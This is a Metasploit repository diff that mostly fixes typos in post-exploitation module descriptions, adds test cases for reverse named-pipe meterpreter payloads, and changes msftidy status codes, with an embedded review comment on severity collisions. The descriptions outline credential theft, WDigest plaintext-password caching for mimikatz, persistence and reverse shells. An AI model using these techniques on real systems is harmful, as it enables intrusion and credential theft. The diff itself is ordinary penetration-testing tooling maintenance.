@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Post 'Name' => 'Multi Manage System Remote TCP Shell Session', 'Description' => %q{ This module will create a Reverse TCP Shell on the target system - using the system own scripting enviroments installed on the + using the system's own scripting environments installed on the target. }, 'License' => MSF_LICENSE, 
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Post end if not cmd.empty? - print_status("Executing reverse tcp shel to #{lhost} on port #{lport}") + print_status("Executing reverse tcp shell to #{lhost} on port #{lport}") cmd_exec("(#{cmd} &)") end end diff --git a/modules/post/osx/gather/enum_chicken_vnc_profile.rb b/modules/post/osx/gather/enum_chicken_vnc_profile.rb index 54694a1dc8..fc7a2f84de 100644 --- a/modules/post/osx/gather/enum_chicken_vnc_profile.rb +++ b/modules/post/osx/gather/enum_chicken_vnc_profile.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module will download the "Chicken of the VNC" client application's profile file, which is used to store other VNC servers' information such - as as the IP and password. + as the IP and password. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], diff --git a/modules/post/osx/gather/enum_keychain.rb b/modules/post/osx/gather/enum_keychain.rb index 2cae840a30..a612592da9 100644 --- a/modules/post/osx/gather/enum_keychain.rb +++ b/modules/post/osx/gather/enum_keychain.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Post This module presents a way to quickly go through the current user's keychains and collect data such as email accounts, servers, and other services. Please note: when using the GETPASS and GETPASS_AUTO_ACCEPT option, the user may see an authentication - alert flash briefly on their screen that gets dismissed by a programatically triggered click. + alert flash briefly on their screen that gets dismissed by a programmatically triggered click. }, 'License' => MSF_LICENSE, 'Author' => [ 'ipwnstuff ', 'joev' ], diff --git a/modules/post/osx/gather/safari_lastsession.rb b/modules/post/osx/gather/safari_lastsession.rb index 2a8b233aa9..d60051d58f 100644 --- a/modules/post/osx/gather/safari_lastsession.rb +++ b/modules/post/osx/gather/safari_lastsession.rb 
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Post to find the credential for Gmail. The Gmail's last session state may contain the user's credential if his/her first login attempt failed (likely due to a typo), and then the page got refreshed or another login attempt was made. This also means - the stolen credential might contains typos. + the stolen credential might contain typos. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], diff --git a/modules/post/solaris/gather/checkvm.rb b/modules/post/solaris/gather/checkvm.rb index 777e80720c..4e690f439d 100644 --- a/modules/post/solaris/gather/checkvm.rb +++ b/modules/post/solaris/gather/checkvm.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module attempts to determine whether the system is running inside of a virtual environment and if so, which one. This - module supports detectoin of Solaris Zone, VMWare, VirtualBox, Xen, + module supports detection of Solaris Zone, VMWare, VirtualBox, Xen, and QEMU/KVM.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], diff --git a/modules/post/windows/gather/checkvm.rb b/modules/post/windows/gather/checkvm.rb index fc9151819d..8f2decf674 100644 --- a/modules/post/windows/gather/checkvm.rb +++ b/modules/post/windows/gather/checkvm.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module attempts to determine whether the system is running inside of a virtual environment and if so, which one. This - module supports detectoin of Hyper-V, VMWare, Virtual PC, + module supports detection of Hyper-V, VMWare, Virtual PC, VirtualBox, Xen, and QEMU. }, 'License' => MSF_LICENSE, diff --git a/modules/post/windows/gather/credentials/flashfxp.rb b/modules/post/windows/gather/credentials/flashfxp.rb index 18c47ac40b..ce33d25421 100644 --- a/modules/post/windows/gather/credentials/flashfxp.rb +++ b/modules/post/windows/gather/credentials/flashfxp.rb 
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post super(update_info(info, 'Name' => 'Windows Gather FlashFXP Saved Password Extraction', 'Description' => %q{ - This module extracts weakly encrypted saved FTP Passwords from FlashFXP. It + This module extracts weakly encrypted saved FTP Passwords from FlashFXP. It finds saved FTP connections in the Sites.dat file. }, 'License' => MSF_LICENSE, 'Author' => [ 'theLightCosine'], diff --git a/modules/post/windows/gather/enum_domain_users.rb b/modules/post/windows/gather/enum_domain_users.rb index abaa9efc3e..4b3c8646eb 100644 --- a/modules/post/windows/gather/enum_domain_users.rb +++ b/modules/post/windows/gather/enum_domain_users.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Post 'Name' => 'Windows Gather Enumerate Active Domain Users', 'Description' => %q{ This module will enumerate computers included in the primary Domain and attempt - to list all locations the targeted user has sessions on. If a the HOST option is specified + to list all locations the targeted user has sessions on. If the HOST option is specified the module will target only that host. If the HOST is specified and USER is set to nil, all users logged into that host will be returned.' }, diff --git a/modules/post/windows/gather/memory_grep.rb b/modules/post/windows/gather/memory_grep.rb index 5ea88c3426..055b7e423d 100644 --- a/modules/post/windows/gather/memory_grep.rb +++ b/modules/post/windows/gather/memory_grep.rb 
@@ -9,7 +9,7 @@ class MetasploitModule < Msf::Post super( update_info(info, 'Name' => 'Windows Gather Process Memory Grep', 'Description' => %q{ - This module allows for searching the memory space of a proccess for potentially + This module allows for searching the memory space of a process for potentially sensitive data. Please note: When the HEAP option is enabled, the module will have to migrate to the process you are grepping, and will not migrate back automatically. This means that if the user terminates the application after using this module, you diff --git a/modules/post/windows/manage/add_user_domain.rb b/modules/post/windows/manage/add_user_domain.rb index ca66a3368e..14e7ca288a 100644 --- a/modules/post/windows/manage/add_user_domain.rb +++ b/modules/post/windows/manage/add_user_domain.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module adds a user to the Domain and/or to a Domain group. It will check if sufficient privileges are present for certain actions and run - getprivs for system. If you elevated privs to system,the + getprivs for system. If you elevated privs to system, the SeAssignPrimaryTokenPrivilege will not be assigned. You need to migrate to a process that is running as system. If you don't have privs, this script exits. diff --git a/modules/post/windows/manage/forward_pageant.rb b/modules/post/windows/manage/forward_pageant.rb index 4c60ac8ad8..acd23d3410 100644 --- a/modules/post/windows/manage/forward_pageant.rb +++ b/modules/post/windows/manage/forward_pageant.rb 
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post This module forwards SSH agent requests from a local socket to a remote Pageant instance. If a target Windows machine is compromised and is running Pageant, this will allow the attacker to run normal OpenSSH commands (e.g. ssh-add -l) against the Pageant host which are - tunnelled through the meterpreter session. This could therefore be used to authenticate + tunneled through the meterpreter session. This could therefore be used to authenticate with a remote host using a private key which is loaded into a remote user's Pageant instance, without ever having knowledge of the private key itself. diff --git a/modules/post/windows/manage/persistence_exe.rb b/modules/post/windows/manage/persistence_exe.rb index 605e5391a8..76ef787818 100644 --- a/modules/post/windows/manage/persistence_exe.rb +++ b/modules/post/windows/manage/persistence_exe.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Post super(update_info(info, 'Name' => 'Windows Manage Persistent EXE Payload Installer', 'Description' => %q( - This Module will upload a executable to a remote host and make it Persistent. + This Module will upload an executable to a remote host and make it Persistent. It can be installed as USER, SYSTEM, or SERVICE. USER will start on user login, SYSTEM will start on system boot but requires privs. SERVICE will create a new service which will start the payload. Again requires privs. diff --git a/modules/post/windows/manage/priv_migrate.rb b/modules/post/windows/manage/priv_migrate.rb index 3b112f5d83..3c918bf6f1 100644 --- a/modules/post/windows/manage/priv_migrate.rb +++ b/modules/post/windows/manage/priv_migrate.rb 
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Post super( update_info( info, 'Name' => 'Windows Manage Privilege Based Process Migration ', 'Description' => %q{ This module will migrate a Meterpreter session based on session privileges. - It will do everything it can to migrate, including spawing a new User level process. + It will do everything it can to migrate, including spawning a new User level process. For sessions with Admin rights: It will try to migrate into a System level process in the following order: ANAME (if specified), services.exe, wininit.exe, svchost.exe, lsm.exe, lsass.exe, and winlogon.exe. If all these fail and NOFAIL is set to true, it will fall back to User level migration. For sessions with User level rights: diff --git a/modules/post/windows/manage/run_as.rb b/modules/post/windows/manage/run_as.rb index ac31720386..55793f962c 100644 --- a/modules/post/windows/manage/run_as.rb +++ b/modules/post/windows/manage/run_as.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post This module will login with the specified username/password and execute the supplied command as a hidden process. Output is not returned by default, by setting CMDOUT to false output will be redirected to a temp file and read back in to - display.By setting advanced option SETPASS to true, it will reset the users + display. By setting advanced option SETPASS to true, it will reset the users password and then execute the command. ), 'License' => MSF_LICENSE, diff --git a/modules/post/windows/manage/vss_set_storage.rb b/modules/post/windows/manage/vss_set_storage.rb index 4fafdf6d54..84227f6225 100644 --- a/modules/post/windows/manage/vss_set_storage.rb +++ b/modules/post/windows/manage/vss_set_storage.rb 
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Post super(update_info(info, 'Name' => "Windows Manage Set Shadow Copy Storage Space", 'Description' => %q{ - This module will attempt to change the ammount of space + This module will attempt to change the amount of space for volume shadow copy storage. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. diff --git a/modules/post/windows/manage/wdigest_caching.rb b/modules/post/windows/manage/wdigest_caching.rb index eac3ea9815..85de72a541 100644 --- a/modules/post/windows/manage/wdigest_caching.rb +++ b/modules/post/windows/manage/wdigest_caching.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key. - Any subsequest logins will allow mimikatz to recover the plain text passwords from the system's memory. + Any subsequent logins will allow mimikatz to recover the plain text passwords from the system's memory. }, 'License' => MSF_LICENSE, 'Author' => [ 'Kostas Lintovois '], diff --git a/modules/post/windows/recon/computer_browser_discovery.rb b/modules/post/windows/recon/computer_browser_discovery.rb index b3b7d80850..d40a25a614 100644 --- a/modules/post/windows/recon/computer_browser_discovery.rb +++ b/modules/post/windows/recon/computer_browser_discovery.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module uses railgun to discover hostnames and IPs on the network. LTYPE should be set to one of the following values: WK (all workstations), SVR (all servers), SQL (all SQL servers), DC (all Domain Controllers), DCBKUP (all Domain Backup Servers), - NOVELL (all Novell servers), PRINTSVR (all Print Que servers), MASTERBROWSER (all Master Browswers), + NOVELL (all Novell servers), PRINTSVR (all Print Que servers), MASTERBROWSER (all Master Browsers), WINDOWS (all Windows hosts), or UNIX (all Unix hosts). }, 'License' => MSF_LICENSE, diff --git a/modules/post/windows/wlan/wlan_profile.rb b/modules/post/windows/wlan/wlan_profile.rb index c99764869c..fd87fb713e 100644 --- a/modules/post/windows/wlan/wlan_profile.rb +++ b/modules/post/windows/wlan/wlan_profile.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Post 'Name' => 'Windows Gather Wireless Profile', 'Description' => %q{ This module extracts saved Wireless LAN profiles. It will also try to decrypt - the network key material. Behaviour is slightly different between OS versions + the network key material. Behavior is slightly different between OS versions when it comes to WPA. In Windows Vista/7 we will get the passphrase. In Windows XP we will get the PBKDF2 derived key. }, diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 687dace6fa..69578c7a31 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb 
@@ -2929,6 +2929,17 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'windows/meterpreter/reverse_ipv6_tcp' end + context 'windows/meterpreter/reverse_named_pipe' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/windows/reverse_named_pipe', + 'stages/windows/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'windows/meterpreter/reverse_named_pipe' + end + context 'windows/meterpreter/reverse_nonx_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ @@ -3888,6 +3899,17 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'windows/x64/meterpreter/reverse_https' end + context 'windows/x64/meterpreter/reverse_named_pipe' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/windows/x64/reverse_named_pipe', + 'stages/windows/x64/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'windows/x64/meterpreter/reverse_named_pipe' + end + context 'windows/x64/meterpreter/reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb index 2cf50f9f82..11691c7bd1 100755 --- a/tools/dev/msftidy.rb +++ b/tools/dev/msftidy.rb @@ -43,9 +43,10 @@ end class Msftidy # Status codes - OK = 0x00 - WARNINGS = 0x10 - ERRORS = 0x20 + OK = 0 + INFO = 1 + WARNING = 2 + ERROR = 3 # Some compiles regexes REGEX_MSF_EXPLOIT = / \< Msf::Exploit/ @@ -73,7 +74,7 @@ class Msftidy # error. def warn(txt, line=0) line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'WARNING'.yellow}] #{cleanup_text(txt)}" - @status == ERRORS ? @status = ERRORS : @status = WARNINGS + @status += WARNING end # 
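Review bot: The accumulated status introduced here (`OK = 0, INFO = 1, WARNING = 2, ERROR = 3` with `@status += WARNING` in warn, and `+= ERROR` / `+= INFO` in the two msftidy hunks that follow) makes the severities indistinguishable: three INFO messages sum to 3, the same value as a single ERROR, and two WARNINGs equal INFO plus ERROR, so anything that inspects @status against these constants can no longer tell a noisy-but-clean module from a failing one. If @status also becomes the process exit code (not visible in these hunks), the sum is truncated to 8 bits and enough messages wrap it back to 0, reporting success. The info hunk additionally returns on SUPPRESS_INFO_MESSAGES before reaching `@status += INFO`, so the final status depends on whether messages are printed rather than on what was found. Bit flags keep the previous "highest severity present" semantics without these collisions: define INFO, WARNING and ERROR as distinct powers of two and use `@status |= INFO`, `@status |= WARNING` and `@status |= ERROR`, moving the info assignment above the early return if suppressed messages are still meant to count.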
@@ -85,7 +86,7 @@ class Msftidy def error(txt, line=0) line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'ERROR'.red}] #{cleanup_text(txt)}" - @status = ERRORS + @status += ERROR end # Currently unused, but some day msftidy will fix errors for you. @@ -101,6 +102,7 @@ class Msftidy return if SUPPRESS_INFO_MESSAGES line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'INFO'.cyan}] #{cleanup_text(txt)}" + @status += INFO end ##